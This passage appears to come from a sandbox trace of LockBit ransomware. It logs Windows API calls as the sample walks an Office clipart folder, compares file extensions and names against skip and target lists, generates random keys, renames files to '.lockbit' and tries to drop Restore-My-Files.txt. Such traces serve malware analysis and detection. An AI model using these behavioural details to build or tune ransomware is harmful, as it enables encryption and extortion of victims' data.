lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02269_.WMF") returned -1 [0177.136] lstrcmpiW (lpString1="ntldr", lpString2="SO02269_.WMF") returned -1 [0177.136] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02269_.WMF") returned -1 [0177.136] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02269_.WMF") returned -1 [0177.136] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02269_.WMF") returned -1 [0177.136] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02269_.WMF") returned 1 [0177.136] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02269_.WMF") returned -1 [0177.136] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.136] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02269_.WMF") returned=".WMF" [0177.136] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.136] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.137] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.137] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.137] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02269_.WMF.lockbit") returned 72 [0177.137] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02269_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.138] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.138] malloc (_Size=0x40068) returned 0x3df0008 [0177.138] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2800) returned 1 [0177.139] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.139] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.139] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.139] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.139] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.144] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02269_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02269_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.144] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.144] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.145] free (_Block=0x1fa2ed8) [0177.145] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02269_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.145] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.145] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.145] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16efdc00, ftCreationTime.dwHighDateTime=0x1bd4bf9, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x16efdc00, ftLastWriteTime.dwHighDateTime=0x1bd4bf9, nFileSizeHigh=0x0, nFileSizeLow=0xa68, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02270_.WMF", cAlternateFileName="")) returned 1 [0177.145] lstrcmpiW (lpString1=".", lpString2="SO02270_.WMF") returned -1 [0177.145] lstrcmpiW (lpString1="..", lpString2="SO02270_.WMF") returned -1 [0177.145] PathFindExtensionW (pszPath="SO02270_.WMF") returned=".WMF" [0177.146] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.146] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.146] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02270_.WMF") returned -1 [0177.147] lstrcmpiW (lpString1="ntldr", lpString2="SO02270_.WMF") returned -1 [0177.147] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02270_.WMF") returned -1 [0177.147] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02270_.WMF") returned -1 [0177.147] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02270_.WMF") returned -1 [0177.147] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02270_.WMF") returned 1 [0177.147] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02270_.WMF") returned -1 [0177.147] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.147] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02270_.WMF") returned=".WMF" [0177.147] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.147] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.147] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.148] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.148] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02270_.WMF.lockbit") returned 72 [0177.148] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02270_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.152] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.152] malloc (_Size=0x40068) returned 0x3df0008 [0177.152] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2664) returned 1 [0177.152] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.153] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.155] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02270_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02270_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.155] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.155] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.156] free (_Block=0x1fa2ed8) [0177.156] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02270_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.156] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.156] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.156] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3963e00, ftCreationTime.dwHighDateTime=0x1bd4c04, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3963e00, ftLastWriteTime.dwHighDateTime=0x1bd4c04, nFileSizeHigh=0x0, nFileSizeLow=0x30e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02276_.WMF", cAlternateFileName="")) returned 1 [0177.156] lstrcmpiW (lpString1=".", lpString2="SO02276_.WMF") returned -1 [0177.156] lstrcmpiW (lpString1="..", lpString2="SO02276_.WMF") returned -1 [0177.156] PathFindExtensionW (pszPath="SO02276_.WMF") returned=".WMF" [0177.156] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.156] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.156] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.156] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.156] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.156] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.156] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.156] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.156] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.157] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.157] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02276_.WMF") returned -1 [0177.158] lstrcmpiW (lpString1="ntldr", lpString2="SO02276_.WMF") returned -1 [0177.158] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02276_.WMF") returned -1 [0177.158] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02276_.WMF") returned -1 [0177.158] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02276_.WMF") returned -1 [0177.158] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02276_.WMF") returned 1 [0177.158] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02276_.WMF") returned -1 [0177.158] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.158] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02276_.WMF") returned=".WMF" [0177.158] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.158] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.158] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.159] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.159] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02276_.WMF.lockbit") returned 72 [0177.159] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02276_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02276_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0177.160] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.160] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.160] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12516) returned 1 [0177.160] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.161] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.161] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.161] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.161] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.165] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02276_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02276_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.165] malloc (_Size=0xa6) returned 